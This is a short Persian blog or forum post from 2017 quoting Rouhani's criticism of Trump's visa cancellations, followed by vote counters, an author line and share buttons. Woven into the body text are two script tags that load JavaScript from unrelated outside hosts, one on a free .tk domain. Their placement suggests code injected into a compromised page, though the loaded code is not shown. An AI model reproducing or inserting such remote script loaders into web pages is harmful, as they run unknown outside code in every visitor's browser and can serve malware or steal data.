ترامپ تازه وارد و جو زده ؟؟؟


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script> روحانی:
لغو ویزای دیگر ملتها اقدام تازه کارها است
دوران استفاده از دیوار برای فاصله انداختن بین ملتها گذشته؛ امروز عصر ارتباطات است
<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
0

- 
0
ارسال در 1395/11/13 ساعت 14:55 2017-2-1 13:55:47
mohsen
توسط mohsen


عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر